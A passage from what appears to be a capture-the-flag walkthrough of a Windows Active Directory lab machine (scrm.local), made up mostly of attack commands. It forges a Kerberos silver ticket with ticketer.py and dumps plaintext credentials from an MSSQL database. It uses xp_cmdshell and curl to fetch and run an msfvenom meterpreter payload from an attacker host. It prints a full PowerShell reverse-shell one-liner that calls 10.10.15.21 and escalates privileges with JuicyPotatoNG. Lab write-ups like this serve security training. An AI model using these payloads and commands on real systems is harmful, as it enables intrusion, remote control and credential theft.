{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
ldapsearch -H ldap://dc1.scrm.local -U ksimpson -b 'DC=SCRM,DC=LOCAL' | less
# password entered at the prompt: ksimpson
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FzS4S2RQSTTd0MtZ07zf0%2Fimage.png?alt=media&#x26;token=7e6415ff-bb0d-4735-bc2d-b4af8d5d02db" alt=""><figcaption></figcaption></figure>

### ticketer.py

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
python3 ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local
```

{% endcode %}

<div align="left"><figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FDRGGqozsehSNSqNWNhmQ%2Fimage.png?alt=media&#x26;token=4c7ea400-b24b-4a8f-b6a0-4b52844b91e2" alt=""><figcaption></figcaption></figure></div>

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
export KRB5CCNAME=Administrator.ccache
klist
python3 mssqlclient.py dc1.scrm.local -k
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FS6Pm10Rg12tbWxAWAWAB%2Fimage.png?alt=media&#x26;token=cbf7b4e3-51ae-4876-9197-3894c9affcff" alt=""><figcaption></figcaption></figure>

### Extracting credentials from the DB

```sql
SELECT name FROM sys.databases;
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
SELECT * FROM ScrambleHR.dbo.UserImport;
```

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F9jTHIxOVvNTuOHhLUYYW%2Fimage.png?alt=media&#x26;token=73af632b-c6f1-4abc-ac39-fc26fc5e647c" alt=""><figcaption></figcaption></figure>

```
MiscSvc:ScrambledEggs9900
sqlsvc:Pegasus60
ksimpson:ksimpson
```

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FOpGW8dnOt7dO3YjIDaKj%2Fimage.png?alt=media&#x26;token=60150d42-800a-4992-b7e1-9c5d96313ecb" alt=""><figcaption></figcaption></figure>

### MSFVenom Reverse Shell

{% code title="SQL Session" %}

```sql
xp_cmdshell curl 10.10.15.21:8888/3434.exe -o %temp%\3434.exe
xp_cmdshell %temp%\3434.exe
```

{% endcode %}

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=3434 -f exe -o 3434.exe
python3 -m http.server 8888
```

{% endcode %}

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
nc -lvnp 7777
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FopBlO38W1dcKPcKjgk6K%2Fimage.png?alt=media&#x26;token=7f112e05-c675-40a0-982b-787c34d09d3c" alt=""><figcaption></figcaption></figure>

We then notice that the `SeImpersonatePrivilege` privilege is `Enabled`.

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FVG5MZJaOW8nym9xK8AfI%2Fimage.png?alt=media&#x26;token=731627cb-6246-4d65-a2d4-eb7c7dd28693" alt=""><figcaption></figcaption></figure>

Which means we can escalate privileges with **`JuicyPotatoNG`**.

### Privilege escalation with JuicyPotatoNG


{% code title="Windows Machine" overflow="wrap" %}

```
cd %programdata%
curl 10.10.15.21:8888/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
```

{% endcode %}

{% code title="Kali Linux Machine" %}

```
python3 -m http.server 8888
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FHWwvNvlEQgL23sbaTg9s%2Fimage.png?alt=media&#x26;token=3f2256a2-4a5a-436f-830e-0d690d1014a3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2Fw5m4JPsxNwWAjFryY79t%2Fimage.png?alt=media&#x26;token=e88f046f-bb82-46dc-8a1b-64d368903211" alt=""><figcaption></figcaption></figure>

We will use the Invoke-PowerShellTcpOneLine.ps1 shell, modify it (LHOST and LPORT) and then base64-encode it, so that we can later download it to the Windows machine into %programdata%.

{% code title="Invoke-PowerShellTcpOneLine.ps1" overflow="wrap" %}

```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.15.21',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

{% endcode %}

{% code title="Kali Linux Machine" overflow="wrap" %}

```bash
cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t UTF-16LE | base64 -w 0
```

{% endcode %}

```
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
```

{% code title="t.bat" %}

```
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% 
```

{% endcode %}

{% code title="Windows Machine" %}

```bash
cd %programdata%
curl 10.10.15.21:8888/t.bat -o t.bat
powershell
.\JuicyPotatoNG.exe -t * -p C:\ProgramData\t.bat
```

{% endcode %}

{% code title="Kali Linux Machine" %}

```bash
nc -nvlp 6666
```

{% endcode %}

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2FrtKBKGrYG7P1AmRUFWpg%2Fimage.png?alt=media&#x26;token=6a4ff1b0-79fa-40b6-b0e8-39a11eb4f808" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2418983862-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLGWbtqRCldHo6WEY0xxg%2Fuploads%2F4p4Vhm3L3u7GIY2JQfPz%2Fimage.png?alt=media&#x26;token=36552674-5152-4418-997b-337f3975100d" alt=""><figcaption></figcaption></figure>

[^1]: Administrator user ID (RID 500)
